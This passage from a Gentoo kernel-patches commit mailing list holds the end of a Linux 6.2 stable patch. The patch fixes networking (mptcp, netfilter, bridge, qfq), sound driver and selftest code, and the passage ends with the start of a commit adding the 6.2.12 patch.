++	int ret = kmsan_vmap_pages_range_noflush(addr, end, prot, pages,
++						 page_shift);
++
++	if (ret)
++		return ret;
+ 	return __vmap_pages_range_noflush(addr, end, prot, pages, page_shift);
+ }
+ 
+diff --git a/net/bridge/br_netfilter_hooks.c b/net/bridge/br_netfilter_hooks.c
+index 9554abcfd5b4e..812bd7e1750b6 100644
+--- a/net/bridge/br_netfilter_hooks.c
++++ b/net/bridge/br_netfilter_hooks.c
+@@ -868,12 +868,17 @@ static unsigned int ip_sabotage_in(void *priv,
+ {
+ 	struct nf_bridge_info *nf_bridge = nf_bridge_info_get(skb);
+ 
+-	if (nf_bridge && !nf_bridge->in_prerouting &&
+-	    !netif_is_l3_master(skb->dev) &&
+-	    !netif_is_l3_slave(skb->dev)) {
+-		nf_bridge_info_free(skb);
+-		state->okfn(state->net, state->sk, skb);
+-		return NF_STOLEN;
++	if (nf_bridge) {
++		if (nf_bridge->sabotage_in_done)
++			return NF_ACCEPT;
++
++		if (!nf_bridge->in_prerouting &&
++		    !netif_is_l3_master(skb->dev) &&
++		    !netif_is_l3_slave(skb->dev)) {
++			nf_bridge->sabotage_in_done = 1;
++			state->okfn(state->net, state->sk, skb);
++			return NF_STOLEN;
++		}
+ 	}
+ 
+ 	return NF_ACCEPT;
+diff --git a/net/bridge/br_switchdev.c b/net/bridge/br_switchdev.c
+index 7eb6fd5bb917a..0b5f8e1a7325d 100644
+--- a/net/bridge/br_switchdev.c
++++ b/net/bridge/br_switchdev.c
+@@ -150,6 +150,17 @@ br_switchdev_fdb_notify(struct net_bridge *br,
+ 	if (test_bit(BR_FDB_LOCKED, &fdb->flags))
+ 		return;
+ 
++	/* Entries with these flags were created using ndm_state == NUD_REACHABLE,
++	 * ndm_flags == NTF_MASTER( | NTF_STICKY), ext_flags == 0 by something
++	 * equivalent to 'bridge fdb add ... master dynamic (sticky)'.
++	 * Drivers don't know how to deal with these, so don't notify them to
++	 * avoid confusing them.
++	 */
++	if (test_bit(BR_FDB_ADDED_BY_USER, &fdb->flags) &&
++	    !test_bit(BR_FDB_STATIC, &fdb->flags) &&
++	    !test_bit(BR_FDB_ADDED_BY_EXT_LEARN, &fdb->flags))
++		return;
++
+ 	br_switchdev_fdb_populate(br, &item, fdb, NULL);
+ 
+ 	switch (type) {
+diff --git a/net/ipv6/rpl.c b/net/ipv6/rpl.c
+index 488aec9e1a74f..d1876f1922255 100644
+--- a/net/ipv6/rpl.c
++++ b/net/ipv6/rpl.c
+@@ -32,7 +32,8 @@ static void *ipv6_rpl_segdata_pos(const struct ipv6_rpl_sr_hdr *hdr, int i)
+ size_t ipv6_rpl_srh_size(unsigned char n, unsigned char cmpri,
+ 			 unsigned char cmpre)
+ {
+-	return (n * IPV6_PFXTAIL_LEN(cmpri)) + IPV6_PFXTAIL_LEN(cmpre);
++	return sizeof(struct ipv6_rpl_sr_hdr) + (n * IPV6_PFXTAIL_LEN(cmpri)) +
++		IPV6_PFXTAIL_LEN(cmpre);
+ }
+ 
+ void ipv6_rpl_srh_decompress(struct ipv6_rpl_sr_hdr *outhdr,
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 0fbcb8f4fd651..f20f6664b2ada 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -2316,7 +2316,26 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 			      unsigned int flags)
+ {
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+-	bool need_push, dispose_it;
++	bool dispose_it, need_push = false;
++
++	/* If the first subflow moved to a close state before accept, e.g. due
++	 * to an incoming reset, mptcp either:
++	 * - if either the subflow or the msk are dead, destroy the context
++	 *   (the subflow socket is deleted by inet_child_forget) and the msk
++	 * - otherwise do nothing at the moment and take action at accept and/or
++	 *   listener shutdown - user-space must be able to accept() the closed
++	 *   socket.
++	 */
++	if (msk->in_accept_queue && msk->first == ssk) {
++		if (!sock_flag(sk, SOCK_DEAD) && !sock_flag(ssk, SOCK_DEAD))
++			return;
++
++		/* ensure later check in mptcp_worker() will dispose the msk */
++		sock_set_flag(sk, SOCK_DEAD);
++		lock_sock_nested(ssk, SINGLE_DEPTH_NESTING);
++		mptcp_subflow_drop_ctx(ssk);
++		goto out_release;
++	}
+ 
+ 	dispose_it = !msk->subflow || ssk != msk->subflow->sk;
+ 	if (dispose_it)
+@@ -2352,28 +2371,22 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 	if (!inet_csk(ssk)->icsk_ulp_ops) {
+ 		WARN_ON_ONCE(!sock_flag(ssk, SOCK_DEAD));
+ 		kfree_rcu(subflow, rcu);
+-	} else if (msk->in_accept_queue && msk->first == ssk) {
+-		/* if the first subflow moved to a close state, e.g. due to
+-		 * incoming reset and we reach here before inet_child_forget()
+-		 * the TCP stack could later try to close it via
+-		 * inet_csk_listen_stop(), or deliver it to the user space via
+-		 * accept().
+-		 * We can't delete the subflow - or risk a double free - nor let
+-		 * the msk survive - or will be leaked in the non accept scenario:
+-		 * fallback and let TCP cope with the subflow cleanup.
+-		 */
+-		WARN_ON_ONCE(sock_flag(ssk, SOCK_DEAD));
+-		mptcp_subflow_drop_ctx(ssk);
+ 	} else {
+ 		/* otherwise tcp will dispose of the ssk and subflow ctx */
+-		if (ssk->sk_state == TCP_LISTEN)
++		if (ssk->sk_state == TCP_LISTEN) {
++			tcp_set_state(ssk, TCP_CLOSE);
++			mptcp_subflow_queue_clean(sk, ssk);
++			inet_csk_listen_stop(ssk);
+ 			mptcp_event_pm_listener(ssk, MPTCP_EVENT_LISTENER_CLOSED);
++		}
+ 
+ 		__tcp_close(ssk, 0);
+ 
+ 		/* close acquired an extra ref */
+ 		__sock_put(ssk);
+ 	}
++
++out_release:
+ 	release_sock(ssk);
+ 
+ 	sock_put(ssk);
+@@ -2428,21 +2441,14 @@ static void __mptcp_close_subflow(struct sock *sk)
+ 		mptcp_close_ssk(sk, ssk, subflow);
+ 	}
+ 
+-	/* if the MPC subflow has been closed before the msk is accepted,
+-	 * msk will never be accept-ed, close it now
+-	 */
+-	if (!msk->first && msk->in_accept_queue) {
+-		sock_set_flag(sk, SOCK_DEAD);
+-		inet_sk_state_store(sk, TCP_CLOSE);
+-	}
+ }
+ 
+-static bool mptcp_check_close_timeout(const struct sock *sk)
++static bool mptcp_should_close(const struct sock *sk)
+ {
+ 	s32 delta = tcp_jiffies32 - inet_csk(sk)->icsk_mtup.probe_timestamp;
+ 	struct mptcp_subflow_context *subflow;
+ 
+-	if (delta >= TCP_TIMEWAIT_LEN)
++	if (delta >= TCP_TIMEWAIT_LEN || mptcp_sk(sk)->in_accept_queue)
+ 		return true;
+ 
+ 	/* if all subflows are in closed status don't bother with additional
+@@ -2650,7 +2656,7 @@ static void mptcp_worker(struct work_struct *work)
+ 	 * even if it is orphaned and in FIN_WAIT2 state
+ 	 */
+ 	if (sock_flag(sk, SOCK_DEAD)) {
+-		if (mptcp_check_close_timeout(sk)) {
++		if (mptcp_should_close(sk)) {
+ 			inet_sk_state_store(sk, TCP_CLOSE);
+ 			mptcp_do_fastclose(sk);
+ 		}
+@@ -2897,6 +2903,14 @@ static void __mptcp_destroy_sock(struct sock *sk)
+ 	sock_put(sk);
+ }
+ 
++void __mptcp_unaccepted_force_close(struct sock *sk)
++{
++	sock_set_flag(sk, SOCK_DEAD);
++	inet_sk_state_store(sk, TCP_CLOSE);
++	mptcp_do_fastclose(sk);
++	__mptcp_destroy_sock(sk);
++}
++
+ static __poll_t mptcp_check_readable(struct mptcp_sock *msk)
+ {
+ 	/* Concurrent splices from sk_receive_queue into receive_queue will
+@@ -3724,6 +3738,18 @@ static int mptcp_stream_accept(struct socket *sock, struct socket *newsock,
+ 			if (!ssk->sk_socket)
+ 				mptcp_sock_graft(ssk, newsock);
+ 		}
++
++		/* Do late cleanup for the first subflow as necessary. Also
++		 * deal with bad peers not doing a complete shutdown.
++		 */
++		if (msk->first &&
++		    unlikely(inet_sk_state_load(msk->first) == TCP_CLOSE)) {
++			__mptcp_close_ssk(newsk, msk->first,
++					  mptcp_subflow_ctx(msk->first), 0);
++			if (unlikely(list_empty(&msk->conn_list)))
++				inet_sk_state_store(newsk, TCP_CLOSE);
++		}
++
+ 		release_sock(newsk);
+ 	}
+ 
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index 644cf0686f341..5918cea6a3083 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -629,10 +629,12 @@ void mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 		     struct mptcp_subflow_context *subflow);
+ void __mptcp_subflow_send_ack(struct sock *ssk);
+ void mptcp_subflow_reset(struct sock *ssk);
++void mptcp_subflow_queue_clean(struct sock *sk, struct sock *ssk);
+ void mptcp_sock_graft(struct sock *sk, struct socket *parent);
+ struct socket *__mptcp_nmpc_socket(const struct mptcp_sock *msk);
+ bool __mptcp_close(struct sock *sk, long timeout);
+ void mptcp_cancel_work(struct sock *sk);
++void __mptcp_unaccepted_force_close(struct sock *sk);
+ void mptcp_set_owner_r(struct sk_buff *skb, struct sock *sk);
+ 
+ bool mptcp_addresses_equal(const struct mptcp_addr_info *a,
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index dbc02c2c57ccc..670c880110140 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -722,9 +722,12 @@ void mptcp_subflow_drop_ctx(struct sock *ssk)
+ 	if (!ctx)
+ 		return;
+ 
+-	subflow_ulp_fallback(ssk, ctx);
+-	if (ctx->conn)
+-		sock_put(ctx->conn);
++	list_del(&mptcp_subflow_ctx(ssk)->node);
++	if (inet_csk(ssk)->icsk_ulp_ops) {
++		subflow_ulp_fallback(ssk, ctx);
++		if (ctx->conn)
++			sock_put(ctx->conn);
++	}
+ 
+ 	kfree_rcu(ctx, rcu);
+ }
+@@ -1816,6 +1819,77 @@ static void subflow_state_change(struct sock *sk)
+ 	}
+ }
+ 
++void mptcp_subflow_queue_clean(struct sock *listener_sk, struct sock *listener_ssk)
++{
++	struct request_sock_queue *queue = &inet_csk(listener_ssk)->icsk_accept_queue;
++	struct mptcp_sock *msk, *next, *head = NULL;
++	struct request_sock *req;
++	struct sock *sk;
++
++	/* build a list of all unaccepted mptcp sockets */
++	spin_lock_bh(&queue->rskq_lock);
++	for (req = queue->rskq_accept_head; req; req = req->dl_next) {
++		struct mptcp_subflow_context *subflow;
++		struct sock *ssk = req->sk;
++
++		if (!sk_is_mptcp(ssk))
++			continue;
++
++		subflow = mptcp_subflow_ctx(ssk);
++		if (!subflow || !subflow->conn)
++			continue;
++
++		/* skip if already in list */
++		sk = subflow->conn;
++		msk = mptcp_sk(sk);
++		if (msk->dl_next || msk == head)
++			continue;
++
++		sock_hold(sk);
++		msk->dl_next = head;
++		head = msk;
++	}
++	spin_unlock_bh(&queue->rskq_lock);
++	if (!head)
++		return;
++
++	/* can't acquire the msk socket lock under the subflow one,
++	 * or will cause ABBA deadlock
++	 */
++	release_sock(listener_ssk);
++
++	for (msk = head; msk; msk = next) {
++		sk = (struct sock *)msk;
++
++		lock_sock_nested(sk, SINGLE_DEPTH_NESTING);
++		next = msk->dl_next;
++		msk->dl_next = NULL;
++
++		__mptcp_unaccepted_force_close(sk);
++		release_sock(sk);
++
++		/* lockdep will report a false positive ABBA deadlock
++		 * between cancel_work_sync and the listener socket.
++		 * The involved locks belong to different sockets WRT
++		 * the existing AB chain.
++		 * Using a per socket key is problematic as key
++		 * deregistration requires process context and must be
++		 * performed at socket disposal time, in atomic
++		 * context.
++		 * Just tell lockdep to consider the listener socket
++		 * released here.
++		 */
++		mutex_release(&listener_sk->sk_lock.dep_map, _RET_IP_);
++		mptcp_cancel_work(sk);
++		mutex_acquire(&listener_sk->sk_lock.dep_map, 0, 0, _RET_IP_);
++
++		sock_put(sk);
++	}
++
++	/* we are still under the listener msk socket lock */
++	lock_sock_nested(listener_ssk, SINGLE_DEPTH_NESTING);
++}
++
+ static int subflow_ulp_init(struct sock *sk)
+ {
+ 	struct inet_connection_sock *icsk = inet_csk(sk);
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 6023c9f72cdca..ce8a047ef8306 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -3439,6 +3439,64 @@ static int nft_table_validate(struct net *net, const struct nft_table *table)
+ 	return 0;
+ }
+ 
++int nft_setelem_validate(const struct nft_ctx *ctx, struct nft_set *set,
++			 const struct nft_set_iter *iter,
++			 struct nft_set_elem *elem)
++{
++	const struct nft_set_ext *ext = nft_set_elem_ext(set, elem->priv);
++	struct nft_ctx *pctx = (struct nft_ctx *)ctx;
++	const struct nft_data *data;
++	int err;
++
++	if (nft_set_ext_exists(ext, NFT_SET_EXT_FLAGS) &&
++	    *nft_set_ext_flags(ext) & NFT_SET_ELEM_INTERVAL_END)
++		return 0;
++
++	data = nft_set_ext_data(ext);
++	switch (data->verdict.code) {
++	case NFT_JUMP:
++	case NFT_GOTO:
++		pctx->level++;
++		err = nft_chain_validate(ctx, data->verdict.chain);
++		if (err < 0)
++			return err;
++		pctx->level--;
++		break;
++	default:
++		break;
++	}
++
++	return 0;
++}
++
++struct nft_set_elem_catchall {
++	struct list_head	list;
++	struct rcu_head		rcu;
++	void			*elem;
++};
++
++int nft_set_catchall_validate(const struct nft_ctx *ctx, struct nft_set *set)
++{
++	u8 genmask = nft_genmask_next(ctx->net);
++	struct nft_set_elem_catchall *catchall;
++	struct nft_set_elem elem;
++	struct nft_set_ext *ext;
++	int ret = 0;
++
++	list_for_each_entry_rcu(catchall, &set->catchall_list, list) {
++		ext = nft_set_elem_ext(set, catchall->elem);
++		if (!nft_set_elem_active(ext, genmask))
++			continue;
++
++		elem.priv = catchall->elem;
++		ret = nft_setelem_validate(ctx, set, NULL, &elem);
++		if (ret < 0)
++			return ret;
++	}
++
++	return ret;
++}
++
+ static struct nft_rule *nft_rule_lookup_byid(const struct net *net,
+ 					     const struct nft_chain *chain,
+ 					     const struct nlattr *nla);
+@@ -4743,12 +4801,6 @@ err_set_name:
+ 	return err;
+ }
+ 
+-struct nft_set_elem_catchall {
+-	struct list_head	list;
+-	struct rcu_head		rcu;
+-	void			*elem;
+-};
+-
+ static void nft_set_catchall_destroy(const struct nft_ctx *ctx,
+ 				     struct nft_set *set)
+ {
+@@ -6036,7 +6088,8 @@ static int nft_add_set_elem(struct nft_ctx *ctx, struct nft_set *set,
+ 	if (err < 0)
+ 		return err;
+ 
+-	if (!nla[NFTA_SET_ELEM_KEY] && !(flags & NFT_SET_ELEM_CATCHALL))
++	if (((flags & NFT_SET_ELEM_CATCHALL) && nla[NFTA_SET_ELEM_KEY]) ||
++	    (!(flags & NFT_SET_ELEM_CATCHALL) && !nla[NFTA_SET_ELEM_KEY]))
+ 		return -EINVAL;
+ 
+ 	if (flags != 0) {
+@@ -7028,7 +7081,7 @@ static int nf_tables_newobj(struct sk_buff *skb, const struct nfnl_info *info,
+ 	}
+ 
+ 	if (nla[NFTA_OBJ_USERDATA]) {
+-		obj->udata = nla_memdup(nla[NFTA_OBJ_USERDATA], GFP_KERNEL);
++		obj->udata = nla_memdup(nla[NFTA_OBJ_USERDATA], GFP_KERNEL_ACCOUNT);
+ 		if (obj->udata == NULL)
+ 			goto err_userdata;
+ 
+diff --git a/net/netfilter/nft_lookup.c b/net/netfilter/nft_lookup.c
+index cae5a67241634..cecf8ab90e58f 100644
+--- a/net/netfilter/nft_lookup.c
++++ b/net/netfilter/nft_lookup.c
+@@ -199,37 +199,6 @@ nla_put_failure:
+ 	return -1;
+ }
+ 
+-static int nft_lookup_validate_setelem(const struct nft_ctx *ctx,
+-				       struct nft_set *set,
+-				       const struct nft_set_iter *iter,
+-				       struct nft_set_elem *elem)
+-{
+-	const struct nft_set_ext *ext = nft_set_elem_ext(set, elem->priv);
+-	struct nft_ctx *pctx = (struct nft_ctx *)ctx;
+-	const struct nft_data *data;
+-	int err;
+-
+-	if (nft_set_ext_exists(ext, NFT_SET_EXT_FLAGS) &&
+-	    *nft_set_ext_flags(ext) & NFT_SET_ELEM_INTERVAL_END)
+-		return 0;
+-
+-	data = nft_set_ext_data(ext);
+-	switch (data->verdict.code) {
+-	case NFT_JUMP:
+-	case NFT_GOTO:
+-		pctx->level++;
+-		err = nft_chain_validate(ctx, data->verdict.chain);
+-		if (err < 0)
+-			return err;
+-		pctx->level--;
+-		break;
+-	default:
+-		break;
+-	}
+-
+-	return 0;
+-}
+-
+ static int nft_lookup_validate(const struct nft_ctx *ctx,
+ 			       const struct nft_expr *expr,
+ 			       const struct nft_data **d)
+@@ -245,9 +214,12 @@ static int nft_lookup_validate(const struct nft_ctx *ctx,
+ 	iter.skip	= 0;
+ 	iter.count	= 0;
+ 	iter.err	= 0;
+-	iter.fn		= nft_lookup_validate_setelem;
++	iter.fn		= nft_setelem_validate;
+ 
+ 	priv->set->ops->walk(ctx, priv->set, &iter);
++	if (!iter.err)
++		iter.err = nft_set_catchall_validate(ctx, priv->set);
++
+ 	if (iter.err < 0)
+ 		return iter.err;
+ 
+diff --git a/net/sched/sch_qfq.c b/net/sched/sch_qfq.c
+index cf5ebe43b3b4e..02098a02943eb 100644
+--- a/net/sched/sch_qfq.c
++++ b/net/sched/sch_qfq.c
+@@ -421,15 +421,16 @@ static int qfq_change_class(struct Qdisc *sch, u32 classid, u32 parentid,
+ 	} else
+ 		weight = 1;
+ 
+-	if (tb[TCA_QFQ_LMAX]) {
++	if (tb[TCA_QFQ_LMAX])
+ 		lmax = nla_get_u32(tb[TCA_QFQ_LMAX]);
+-		if (lmax < QFQ_MIN_LMAX || lmax > (1UL << QFQ_MTU_SHIFT)) {
+-			pr_notice("qfq: invalid max length %u\n", lmax);
+-			return -EINVAL;
+-		}
+-	} else
++	else
+ 		lmax = psched_mtu(qdisc_dev(sch));
+ 
++	if (lmax < QFQ_MIN_LMAX || lmax > (1UL << QFQ_MTU_SHIFT)) {
++		pr_notice("qfq: invalid max length %u\n", lmax);
++		return -EINVAL;
++	}
++
+ 	inv_w = ONE_FP / weight;
+ 	weight = ONE_FP / inv_w;
+ 
+diff --git a/rust/kernel/print.rs b/rust/kernel/print.rs
+index 30103325696d8..8009184bf6d76 100644
+--- a/rust/kernel/print.rs
++++ b/rust/kernel/print.rs
+@@ -18,7 +18,11 @@ use crate::bindings;
+ 
+ // Called from `vsprintf` with format specifier `%pA`.
+ #[no_mangle]
+-unsafe fn rust_fmt_argument(buf: *mut c_char, end: *mut c_char, ptr: *const c_void) -> *mut c_char {
++unsafe extern "C" fn rust_fmt_argument(
++    buf: *mut c_char,
++    end: *mut c_char,
++    ptr: *const c_void,
++) -> *mut c_char {
+     use fmt::Write;
+     // SAFETY: The C contract guarantees that `buf` is valid if it's less than `end`.
+     let mut w = unsafe { RawFormatter::from_ptrs(buf.cast(), end.cast()) };
+diff --git a/rust/kernel/str.rs b/rust/kernel/str.rs
+index b771310fa4a49..cd3d2a6cf1fc1 100644
+--- a/rust/kernel/str.rs
++++ b/rust/kernel/str.rs
+@@ -408,7 +408,7 @@ impl RawFormatter {
+     /// If `pos` is less than `end`, then the region between `pos` (inclusive) and `end`
+     /// (exclusive) must be valid for writes for the lifetime of the returned [`RawFormatter`].
+     pub(crate) unsafe fn from_ptrs(pos: *mut u8, end: *mut u8) -> Self {
+-        // INVARIANT: The safety requierments guarantee the type invariants.
++        // INVARIANT: The safety requirements guarantee the type invariants.
+         Self {
+             beg: pos as _,
+             pos: pos as _,
+diff --git a/scripts/asn1_compiler.c b/scripts/asn1_compiler.c
+index 71d4a7c879008..c3e501451b41d 100644
+--- a/scripts/asn1_compiler.c
++++ b/scripts/asn1_compiler.c
+@@ -625,7 +625,7 @@ int main(int argc, char **argv)
+ 	p = strrchr(argv[1], '/');
+ 	p = p ? p + 1 : argv[1];
+ 	grammar_name = strdup(p);
+-	if (!p) {
++	if (!grammar_name) {
+ 		perror(NULL);
+ 		exit(1);
+ 	}
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 6a6c72b5ea26d..f70d6a33421d2 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9468,6 +9468,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8b47, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5d, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5e, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8b65, "HP ProBook 455 15.6 inch G10 Notebook PC", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b66, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b7a, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b7d, "HP", ALC236_FIXUP_HP_GPIO_LED),
+diff --git a/sound/soc/fsl/fsl_asrc_dma.c b/sound/soc/fsl/fsl_asrc_dma.c
+index 3b81a465814a1..05a7d1588d204 100644
+--- a/sound/soc/fsl/fsl_asrc_dma.c
++++ b/sound/soc/fsl/fsl_asrc_dma.c
+@@ -209,14 +209,19 @@ static int fsl_asrc_dma_hw_params(struct snd_soc_component *component,
+ 		be_chan = soc_component_to_pcm(component_be)->chan[substream->stream];
+ 		tmp_chan = be_chan;
+ 	}
+-	if (!tmp_chan)
+-		tmp_chan = dma_request_slave_channel(dev_be, tx ? "tx" : "rx");
++	if (!tmp_chan) {
++		tmp_chan = dma_request_chan(dev_be, tx ? "tx" : "rx");
++		if (IS_ERR(tmp_chan)) {
++			dev_err(dev, "failed to request DMA channel for Back-End\n");
++			return -EINVAL;
++		}
++	}
+ 
+ 	/*
+ 	 * An EDMA DEV_TO_DEV channel is fixed and bound with DMA event of each
+ 	 * peripheral, unlike SDMA channel that is allocated dynamically. So no
+ 	 * need to configure dma_request and dma_request2, but get dma_chan of
+-	 * Back-End device directly via dma_request_slave_channel.
++	 * Back-End device directly via dma_request_chan.
+ 	 */
+ 	if (!asrc->use_edma) {
+ 		/* Get DMA request of Back-End */
+diff --git a/sound/soc/fsl/fsl_sai.c b/sound/soc/fsl/fsl_sai.c
+index 4967f2daa6d97..96a2755b8747e 100644
+--- a/sound/soc/fsl/fsl_sai.c
++++ b/sound/soc/fsl/fsl_sai.c
+@@ -1543,7 +1543,7 @@ static const struct fsl_sai_soc_data fsl_sai_imx8qm_data = {
+ 	.use_imx_pcm = true,
+ 	.use_edma = true,
+ 	.fifo_depth = 64,
+-	.pins = 1,
++	.pins = 4,
+ 	.reg_offset = 0,
+ 	.mclk0_is_mclk1 = false,
+ 	.flags = 0,
+diff --git a/sound/soc/sof/ipc4-topology.c b/sound/soc/sof/ipc4-topology.c
+index 4f7adbe671f3e..e0f92ab468896 100644
+--- a/sound/soc/sof/ipc4-topology.c
++++ b/sound/soc/sof/ipc4-topology.c
+@@ -1687,10 +1687,12 @@ static int sof_ipc4_route_setup(struct snd_sof_dev *sdev, struct snd_sof_route *
+ 	int ret;
+ 
+ 	if (!src_fw_module || !sink_fw_module) {
+-		/* The NULL module will print as "(efault)" */
+-		dev_err(sdev->dev, "source %s or sink %s widget weren't set up properly\n",
+-			src_fw_module->man4_module_entry.name,
+-			sink_fw_module->man4_module_entry.name);
++		dev_err(sdev->dev,
++			"cannot bind %s -> %s, no firmware module for: %s%s\n",
++			src_widget->widget->name, sink_widget->widget->name,
++			src_fw_module ? "" : " source",
++			sink_fw_module ? "" : " sink");
++
+ 		return -ENODEV;
+ 	}
+ 
+diff --git a/sound/soc/sof/pm.c b/sound/soc/sof/pm.c
+index 8722bbd7fd3d7..26ffcbb6e30f4 100644
+--- a/sound/soc/sof/pm.c
++++ b/sound/soc/sof/pm.c
+@@ -183,6 +183,7 @@ static int sof_suspend(struct device *dev, bool runtime_suspend)
+ 	const struct sof_ipc_tplg_ops *tplg_ops = sdev->ipc->ops->tplg;
+ 	pm_message_t pm_state;
+ 	u32 target_state = snd_sof_dsp_power_target(sdev);
++	u32 old_state = sdev->dsp_power_state.state;
+ 	int ret;
+ 
+ 	/* do nothing if dsp suspend callback is not set */
+@@ -192,7 +193,12 @@ static int sof_suspend(struct device *dev, bool runtime_suspend)
+ 	if (runtime_suspend && !sof_ops(sdev)->runtime_suspend)
+ 		return 0;
+ 
+-	if (tplg_ops && tplg_ops->tear_down_all_pipelines)
++	/* we need to tear down pipelines only if the DSP hardware is
++	 * active, which happens for PCI devices. if the device is
++	 * suspended, it is brought back to full power and then
++	 * suspended again
++	 */
++	if (tplg_ops && tplg_ops->tear_down_all_pipelines && (old_state == SOF_DSP_PM_D0))
+ 		tplg_ops->tear_down_all_pipelines(sdev, false);
+ 
+ 	if (sdev->fw_state != SOF_FW_BOOT_COMPLETE)
+diff --git a/tools/testing/selftests/sigaltstack/current_stack_pointer.h b/tools/testing/selftests/sigaltstack/current_stack_pointer.h
+new file mode 100644
+index 0000000000000..ea9bdf3a90b16
+--- /dev/null
++++ b/tools/testing/selftests/sigaltstack/current_stack_pointer.h
+@@ -0,0 +1,23 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++
++#if __alpha__
++register unsigned long sp asm("$30");
++#elif __arm__ || __aarch64__ || __csky__ || __m68k__ || __mips__ || __riscv
++register unsigned long sp asm("sp");
++#elif __i386__
++register unsigned long sp asm("esp");
++#elif __loongarch64
++register unsigned long sp asm("$sp");
++#elif __ppc__
++register unsigned long sp asm("r1");
++#elif __s390x__
++register unsigned long sp asm("%15");
++#elif __sh__
++register unsigned long sp asm("r15");
++#elif __x86_64__
++register unsigned long sp asm("rsp");
++#elif __XTENSA__
++register unsigned long sp asm("a1");
++#else
++#error "implement current_stack_pointer equivalent"
++#endif
+diff --git a/tools/testing/selftests/sigaltstack/sas.c b/tools/testing/selftests/sigaltstack/sas.c
+index c53b070755b65..98d37cb744fb2 100644
+--- a/tools/testing/selftests/sigaltstack/sas.c
++++ b/tools/testing/selftests/sigaltstack/sas.c
+@@ -20,6 +20,7 @@
+ #include <sys/auxv.h>
+ 
+ #include "../kselftest.h"
++#include "current_stack_pointer.h"
+ 
+ #ifndef SS_AUTODISARM
+ #define SS_AUTODISARM  (1U << 31)
+@@ -46,12 +47,6 @@ void my_usr1(int sig, siginfo_t *si, void *u)
+ 	stack_t stk;
+ 	struct stk_data *p;
+ 
+-#if __s390x__
+-	register unsigned long sp asm("%15");
+-#else
+-	register unsigned long sp asm("sp");
+-#endif
+-
+ 	if (sp < (unsigned long)sstack ||
+ 			sp >= (unsigned long)sstack + stack_size) {
+ 		ksft_exit_fail_msg("SP is not on sigaltstack\n");
+diff --git a/tools/vm/page_owner_sort.c b/tools/vm/page_owner_sort.c
+index ce860ab941629..58ebfe3924024 100644
+--- a/tools/vm/page_owner_sort.c
++++ b/tools/vm/page_owner_sort.c
+@@ -847,7 +847,7 @@ int main(int argc, char **argv)
+ 			if (cull & CULL_PID || filter & FILTER_PID)
+ 				fprintf(fout, ", PID %d", list[i].pid);
+ 			if (cull & CULL_TGID || filter & FILTER_TGID)
+-				fprintf(fout, ", TGID %d", list[i].pid);
++				fprintf(fout, ", TGID %d", list[i].tgid);
+ 			if (cull & CULL_COMM || filter & FILTER_COMM)
+ 				fprintf(fout, ", task_comm_name: %s", list[i].comm);
+ 			if (cull & CULL_ALLOCATOR) {


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-04-20 11:15 Alice Ferrazzi
  0 siblings, 0 replies; 30+ messages in thread
From: Alice Ferrazzi @ 2023-04-20 11:15 UTC (permalink / raw
  To: gentoo-commits

commit:     f81bcf340ea7e0ecf04ff727f3a739fb7b1b49c9
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Thu Apr 20 11:15:27 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Thu Apr 20 11:15:27 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=f81bcf34

Linux patch 6.2.12

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README             |    4 +
 1011_linux-6.2.12.patch | 5038 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 5042 insertions(+)

diff --git a/0000_README b/0000_README
index eb41631d..3bd4fbeb 100644
--- a/0000_README
+++ b/0000_README
@@ -87,6 +87,10 @@ Patch:  1010_linux-6.2.11.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.2.11
 
+Patch:  1011_linux-6.2.12.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.12
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1011_linux-6.2.12.patch b/1011_linux-6.2.12.patch
new file mode 100644
index 00000000..9bbea713
--- /dev/null
+++ b/1011_linux-6.2.12.patch
@@ -0,0 +1,5038 @@
+diff --git a/Documentation/networking/ip-sysctl.rst b/Documentation/networking/ip-sysctl.rst
+index 7fbd060d60470..afed49280b52e 100644
+--- a/Documentation/networking/ip-sysctl.rst
++++ b/Documentation/networking/ip-sysctl.rst
